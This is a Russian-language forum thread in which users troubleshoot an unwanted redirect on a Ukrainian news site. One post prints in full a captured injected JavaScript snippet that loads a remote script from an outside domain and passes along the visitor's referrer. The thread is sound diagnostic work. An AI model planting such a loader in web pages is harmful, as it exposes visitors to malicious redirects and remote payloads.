Вирус, глюк или что? Непонятный редирект.
У меня сегодня уже тоже нормально. Хотя поначалу тоже пыталось редиректить, но после принудительного обновления странички — перестало.
Вывод мой таков. Изначально вредоносный скрипт был на страничках. Как он туда попал, другой вопрос. Может на источнике, может в банерах или у провайдера(последнее менее вероятно, так как наблюдалось у нескольких провайдеров). Но факт, что сегодня уже идут странички без этого скрипта.
Скрип удалось отловить, вот он:
<script language="JavaScript" type="text/javascript">
var ITCGRef = 'none';if (document.referrer) ITCGRef = escape(document.referrer);
var ITCGuTail = '?randad' + Math.round((Math.random()*10000000)) + '&' + ITCGRef;
var ITCGSc = '<'+'script language="JavaScript" type="text/javascript" ';
ITCGSc += 'src="http://www.itcgin.net/show/24750401/show.js'+ITCGuTail;
ITCGSc += '"><'+'/script'+'>';
document.write(ITCGSc);
</script>
Спасибо (и по +1
)всем кто отозвался.Символы < в предыдущем сообщении необходимо заменить на знак "меньше"
Поспешил, не всё нормально, с этой ссылки: http://podrobnosti.ua/criminal/2011/05/21/770703.html по прежнему редиректит. Если отключить жаву-скрипт, то не перенапраляет. А вот с бигмира уже не перенаправляет.
Также замечено, что через некоторые прокси-сервера не перенаправляет(например опера-турбо), хотя скрипт в коде присутствует.
Просьба ещё ко всем, кому не лень, проверить наличие вышеприведенного скрипта в коде странички что в ссылке выше в этом посте. Искать можно по ключевому слову "itcgin".
Онлайн вьювер кода тоже видит этот скрипт, значит он изначально присутствует в коде странички. Т.е. не на моём компьютере генерится (уже легче ).
Остался вопрос, почему у одних срабатывает редирект, а у других нет? Настройки браузеров, файрвола, антивируса? Что может заблокировать его?